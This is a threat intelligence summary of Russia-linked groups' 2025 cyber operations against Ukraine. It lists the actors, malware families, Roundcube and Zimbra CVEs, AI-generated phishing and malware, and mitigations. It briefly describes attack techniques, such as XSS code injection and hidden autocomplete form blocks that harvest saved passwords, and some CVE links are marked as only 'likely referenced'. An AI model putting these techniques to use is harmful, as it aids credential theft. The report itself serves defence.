Full Report
Russian hackers' adoption of artificial intelligence (AI) in cyber attacks against Ukraine has reached a new level in the first half of 2025 (H1 2025), the country's State Service for Special Communications and Information Protection (SSSCIP) said. "Hackers now employ it not only to generate phishing messages, but some of the malware samples we have analyzed show clear signs of being generated
Analysis Summary
# Threat Actor: Various Russia-Linked Threat Groups (UAC-0219, UAC-0218, UAC-0226, UAC-0227, UAC-0125, APT28/UAC-0001, Sandworm/UAC-0002)
## Attribution & Identity
The actors discussed are generally linked to Russia and are actively conducting cyber operations against Ukraine. The analysis focuses on several distinct but co-occurring groups: UAC-0219, UAC-0218, UAC-0226, UAC-0227, UAC-0125 (a sub-cluster tied to Sandworm), APT28 (UAC-0001), and Sandworm (UAC-0002). A significant finding is the widespread application of Artificial Intelligence (AI) to enhance cyber attacks across these groups.
## Activity Summary
Threat actors are intensifying cyber attacks against Ukraine, utilizing AI for generating phishing content and developing malware. In H1 2025, 3,018 cyber incidents were recorded, showing an increase from H2 2024. Attacks against local authorities and military entities increased, while government and energy sector attacks saw a decline. Operations are synchronized with kinetic battlefield activity (hybrid warfare).
Specific campaign highlights:
* **UAC-0219:** Deployed AI-generated malware named **WRECKSTEEL** against state administration bodies and critical infrastructure.
* **UAC-0218:** Conducted phishing campaigns targeting defense forces using **HOMESTEEL** delivered via booby-trapped RAR archives.
* **UAC-0226:** Targeted defense industrial sector innovators, local government, military units, and law enforcement with **GIFTEDCROOK** stealer.
* **UAC-0227:** Targeted local authorities, critical infrastructure, and Territorial Recruitment and Social Support Centers (TRCs/SSCs) using ClickFix-style tactics or SVG attachments to deliver **Amatera Stealer** and **Strela Stealer**.
* **UAC-0125 (Sandworm Sub-cluster):** Sent emails masquerading as ESET updates to deliver the C#-based backdoor **Kalambur (SUMBUR)**.
* **APT28 (UAC-0001):** Weaponized XSS vulnerabilities in Roundcube and Zimbra webmail software for zero-click attacks.
* **Sandworm (UAC-0002):** Targeted energy, defense, ISP, and research sectors.
## Tactics, Techniques & Procedures
- **AI Integration:** Use of Artificial Intelligence to generate sophisticated phishing messages and potentially generate malware samples.
- **Malware Delivery:** Use of booby-trapped RAR archives and SVG file attachments in phishing to distribute stealers.
- **Zero-Click Exploitation:** APT28 leveraged Cross-Site Scripting (XSS) vulnerabilities in webmail servers (Roundcube/Zimbra).
- CVE-2023-43770 (Roundcube XSS, likely referenced)
- CVE-2024-37383 (Roundcube XSS, likely referenced)
- CVE-2025-49113 (Roundcube XSS, likely referenced)
- CVE-2024-27443 (Zimbra vulnerability, likely referenced)
- CVE-2025-27915 (Zimbra vulnerability, likely referenced)
- **Credential Exfiltration via Webmail Exploits:** For APT28, exploitation involved:
- Injecting malicious code via API to access credentials, contact lists, and redirect email forwarding.
- Creating hidden HTML blocks with `autocomplete='on'` to siphon browser-stored login/password data.
- **Abuse of Legitimate Cloud Services:** Several groups used services like Dropbox and Google Drive for command and control or data staging.
## Targeting
- **Sectors:** Defense forces, state administration bodies, critical infrastructure facilities, defense industrial sector organizations, local government bodies, military units, law enforcement agencies, Territorial Recruitment and Social Support Centers (TRCs/SSCs), energy sector, Internet Service Providers (ISPs), and research sectors.
- **Geography:** Primarily Ukraine.
- **Victims:** Specific organizations are not named, but categories include local and state authorities, and entities involved in defense and innovation.
## Tools & Infrastructure
- **Malware families used:**
- WRECKSTEEL (PowerShell data-stealing malware, possibly AI-developed)
- HOMESTEEL (delivered via phishing)
- GIFTEDCROOK (stealer)
- Amatera Stealer
- Strela Stealer
- Kalambur (SUMBUR) (C#-based backdoor)
- **Infrastructure:** Abuse of legitimate services such as Dropbox and Google Drive. (No specific C2 IPs/domains were defanged in the provided text snippet for these specific campaigns, aside from reference to the webmail platforms exploited).
## Implications
The integration of AI into Russian cyber operations signals a qualitative shift in threat capability, potentially leading to more scalable and effective attacks (e.g., highly personalized phishing or novel malware variants). The synchronized use of cyber attacks with kinetic warfare emphasizes the persistent, multi-domain threat Russia poses to Ukrainian resilience. The exploitation of common webmail infrastructure indicates an ongoing strategy of targeting widely utilized enterprise software.
## Mitigations
- Enhance detection capabilities for AI-generated phishing content and malware signatures.
- Strengthen email gateway filtering to detect anomalous attachments (e.g., booby-trapped RARs, specific SVG files).
- Immediately patch or apply mitigations for reported vulnerabilities in Roundcube and Zimbra (specifically CVE-2023-43770, CVE-2024-37383, CVE-2025-49113, CVE-2024-27443, and CVE-2025-27915).
- Implement strict security policies regarding credential input fields in web applications (e.g., disabling `autocomplete` where possible) to mitigate XSS data harvesting techniques.
- Monitor for suspicious activity related to the abuse of legitimate cloud storage environments (Dropbox, Google Drive).